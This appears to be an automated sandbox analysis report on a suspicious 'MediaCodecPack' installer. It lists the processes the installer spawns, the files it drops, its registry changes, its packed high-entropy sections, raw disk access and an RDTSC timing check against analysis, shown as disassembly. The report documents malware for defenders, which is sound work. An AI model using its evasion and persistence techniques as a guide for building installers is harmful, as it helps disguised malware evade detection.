                    Source: mediacodecpack3.exe, mediacodecpack3.exe, 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.2.dr, is-5V918.tmp.1.dr Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: steel.exe.3.exe String found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
                    Source: steel.exe.3.exe String found in binary or memory: /LOADINF="filename"
                    Source: C:\Users\user\Desktop\steel.exe.3.exe File read: C:\Users\user\Desktop\steel.exe.3.exe
                    Source: unknown Process created: C:\Users\user\Desktop\steel.exe.3.exe "C:\Users\user\Desktop\steel.exe.3.exe"
                    Source: C:\Users\user\Desktop\steel.exe.3.exe Process created: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp "C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp" /SL5="$2043C,3046688,56832,C:\Users\user\Desktop\steel.exe.3.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Process created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe "C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe" -i
                    Source: C:\Users\user\Desktop\steel.exe.3.exe Process created: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp "C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp" /SL5="$2043C,3046688,56832,C:\Users\user\Desktop\steel.exe.3.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Process created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe "C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe" -i
                    Source: C:\Users\user\Desktop\steel.exe.3.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\steel.exe.3.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: textinputframework.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: coreuicomponents.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: coremessaging.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: shfolder.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: msacm32.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: winmmbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: winmmbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: riched20.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: usp10.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: msls31.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: explorerframe.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: sfc.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Section loaded: sfc_os.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: sqlite3.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: appxsip.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: opcservices.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Window found: window name: TMainForm
                    Source: Window Recorder Window detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MediaCodecPack_is1
                    Source: steel.exe.3.exe Static file information: File size 3295664 > 1048576
                    Source: Binary string: msvcp71.pdbx# source: is-CJLSG.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-0BJ08.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-CJLSG.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-SHN24.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-0BJ08.tmp.1.dr

                    Data Obfuscation

Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | Unpacked PE file: 2.2.mediacodecpack3.exe.400000.0.unpack .aitt5:ER;.ajtt5:R;.aktt5:W;.rsrc:R;.altt5:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | Unpacked PE file: 2.2.mediacodecpack3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_004502C0
Source: initial sample | Static PE information: section where entry point is pointing to: .aitt5
Source: mediacodecpack3.exe.1.dr | Static PE information: section name: .aitt5
Source: mediacodecpack3.exe.1.dr | Static PE information: section name: .ajtt5
Source: mediacodecpack3.exe.1.dr | Static PE information: section name: .aktt5
Source: mediacodecpack3.exe.1.dr | Static PE information: section name: .altt5
Source: is-SHN24.tmp.1.dr | Static PE information: section name: Shared
Source: is-5V918.tmp.1.dr | Static PE information: section name: /4
Source: is-5V918.tmp.1.dr | Static PE information: section name: /19
Source: is-5V918.tmp.1.dr | Static PE information: section name: /35
Source: is-5V918.tmp.1.dr | Static PE information: section name: /51
Source: is-5V918.tmp.1.dr | Static PE information: section name: /63
Source: is-5V918.tmp.1.dr | Static PE information: section name: /77
Source: is-5V918.tmp.1.dr | Static PE information: section name: /89
Source: is-5V918.tmp.1.dr | Static PE information: section name: /102
Source: is-5V918.tmp.1.dr | Static PE information: section name: /113
Source: is-5V918.tmp.1.dr | Static PE information: section name: /124
Source: MediaCodecPack.exe.2.dr | Static PE information: section name: .aitt5
Source: MediaCodecPack.exe.2.dr | Static PE information: section name: .ajtt5
Source: MediaCodecPack.exe.2.dr | Static PE information: section name: .aktt5
Source: MediaCodecPack.exe.2.dr | Static PE information: section name: .altt5
Source: sqlite3.dll.2.dr | Static PE information: section name: /4
Source: sqlite3.dll.2.dr | Static PE information: section name: /19
Source: sqlite3.dll.2.dr | Static PE information: section name: /35
Source: sqlite3.dll.2.dr | Static PE information: section name: /51
Source: sqlite3.dll.2.dr | Static PE information: section name: /63
Source: sqlite3.dll.2.dr | Static PE information: section name: /77
Source: sqlite3.dll.2.dr | Static PE information: section name: /89
Source: sqlite3.dll.2.dr | Static PE information: section name: /102
Source: sqlite3.dll.2.dr | Static PE information: section name: /113
Source: sqlite3.dll.2.dr | Static PE information: section name: /124
Source: C:\Users\user\Desktop\steel.exe.3.exe | Code function: 0_2_004065C8 push 00406605h; ret 0_2_004065FD
Source: C:\Users\user\Desktop\steel.exe.3.exe | Code function: 0_2_004040B5 push eax; ret 0_2_004040F1
Source: C:\Users\user\Desktop\steel.exe.3.exe | Code function: 0_2_00408104 push ecx; mov dword ptr [esp], eax 0_2_00408109
Source: C:\Users\user\Desktop\steel.exe.3.exe | Code function: 0_2_00404185 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\steel.exe.3.exe | Code function: 0_2_00404206 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\steel.exe.3.exe | Code function: 0_2_0040C218 push eax; ret 0_2_0040C219
Source: C:\Users\user\Desktop\steel.exe.3.exe | Code function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\steel.exe.3.exe | Code function: 0_2_00404283 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\steel.exe.3.exe | Code function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_0040994C push 00409989h; ret 1_2_00409981
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00483F88 push 00484096h; ret 1_2_0048408E
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_004062B4 push ecx; mov dword ptr [esp], eax 1_2_004062B5
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_004104E0 push ecx; mov dword ptr [esp], edx 1_2_004104E5
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00412928 push 0041298Bh; ret 1_2_00412983
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00494CAC push ecx; mov dword ptr [esp], ecx 1_2_00494CB1
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_0040CE38 push ecx; mov dword ptr [esp], edx 1_2_0040CE3A
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_004592D0 push 00459314h; ret 1_2_0045930C
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_0040F398 push ecx; mov dword ptr [esp], edx 1_2_0040F39A
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00443440 push ecx; mov dword ptr [esp], ecx 1_2_00443444
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_0040546D push eax; ret 1_2_004054A9
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_0040553D push 00405749h; ret 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_004055BE push 00405749h; ret 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00485678 push ecx; mov dword ptr [esp], ecx 1_2_0048567D
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_0040563B push 00405749h; ret 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_004517F8 push 0045182Bh; ret 1_2_00451823
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_004519BC push ecx; mov dword ptr [esp], eax 1_2_004519C1
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00477B08 push ecx; mov dword ptr [esp], edx 1_2_00477B09
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00419C28 push ecx; mov dword ptr [esp], ecx 1_2_00419C2D
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_0045FD1C push ecx; mov dword ptr [esp], ecx 1_2_0045FD20
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00499D30 pushad ; retf 1_2_00499D3F
Source: mediacodecpack3.exe.1.dr | Static PE information: section name: .aitt5 entropy: 7.743465021339394
Source: MediaCodecPack.exe.2.dr | Static PE information: section name: .aitt5 entropy: 7.743465021339394

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 2_2_02B9E8A7
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-SHN24.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-UGFNO.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-5V918.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\gdiplus.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\sqlite3.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\msvcp71.dll (copy)
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | File created: C:\ProgramData\MediaCodecPack\MediaCodecPack.exe
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\msvcr71.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | File created: C:\Users\user\AppData\Local\Temp\is-SM9H7.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-0BJ08.tmp
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | File created: C:\ProgramData\MediaCodecPack\sqlite3.dll
Source: C:\Users\user\Desktop\steel.exe.3.exe | File created: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | File created: C:\Users\user\AppData\Local\Temp\is-SM9H7.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-CJLSG.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\uninstall\is-67S07.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | File created: C:\Users\user\AppData\Local\Temp\is-SM9H7.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\uninstall\unins000.exe (copy)

Boot Survival

Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 2_2_02B9E8A7
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | Code function: 2_2_00401951 GetLocalTime,StartServiceCtrlDispatcherA,lstrcmpiW, 2_2_00401951
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 1_2_00423C0C
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_004241DC IsIconic,SetActiveWindow,SetFocus, 1_2_004241DC
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00424194 IsIconic,SetActiveWindow, 1_2_00424194
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00418384 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 1_2_00418384
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_0042285C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 1_2_0042285C
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00417598 IsIconic,GetCapture, 1_2_00417598
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_0048393C IsIconic,GetWindowLongA,ShowWindow,ShowWindow, 1_2_0048393C
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00417CCE IsIconic,SetWindowPos, 1_2_00417CCE
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00417CD0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 1_2_00417CD0
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_0041F118 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 1_2_0041F118
Source: C:\Users\user\Desktop\steel.exe.3.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | RDTSC instruction interceptor: First address: 40D6C2 second address: 40D6C2 instructions: 0x00000000 rdtsc 0x00000002 sal si, FFF1h 0x00000006 mov eax, dword ptr [ebp-0Ch] 0x00000009 mov edx, dword ptr [ebp-30h] 0x0000000c rcr esi, FFFFFFD5h 0x0000000f movzx esi, bx 0x00000012 add edx, dword ptr [eax+0Ch] 0x00000015 lahf 0x00000016 cwde 0x00000017 mov eax, dword ptr [ebp-18h] 0x0000001a mov si, cx 0x0000001d movsx esi, si 0x00000020 mov esi, dword ptr [ebp-18h] 0x00000023 mov cl, byte ptr [ecx+esi] 0x00000026 jmp 00007F9D3CFF97B9h 0x0000002b mov byte ptr [edx+eax], cl 0x0000002e jmp 00007F9D3D01095Ch 0x00000033 mov eax, dword ptr [ebp-18h] 0x00000036 jmp 00007F9D3CFF84ACh 0x0000003b inc eax 0x0000003c ror cl, 0000007Bh 0x0000003f btc ecx, FFFFFF83h 0x00000043 mov dword ptr [ebp-18h], eax 0x00000046 jmp 00007F9D3D010FA0h 0x0000004b mov eax, dword ptr [ebp-28h] 0x0000004e cmp ebp, eax 0x00000050 or ch, cl 0x00000052 mov ecx, dword ptr [ebp-18h] 0x00000055 cmp di, 6D14h 0x0000005a cmp ecx, dword ptr [eax+10h] 0x0000005d jnc 00007F9D3CFF88D3h 0x00000063 mov eax, dword ptr [ebp-28h] 0x00000066 jmp 00007F9D3D004784h 0x0000006b mov ecx, dword ptr [ebp-1Ch] 0x0000006e add si, di 0x00000071 add ecx, dword ptr [eax+14h] 0x00000074 rdtsc
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | Code function: 2_2_0040D6B9 rdtsc 2_2_0040D6B9
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary, 2_2_02B9E9AB
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | Window / User API: threadDelayed 4819
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | Window / User API: threadDelayed 5105
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-SHN24.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-UGFNO.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-5V918.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\gdiplus.dll (copy)
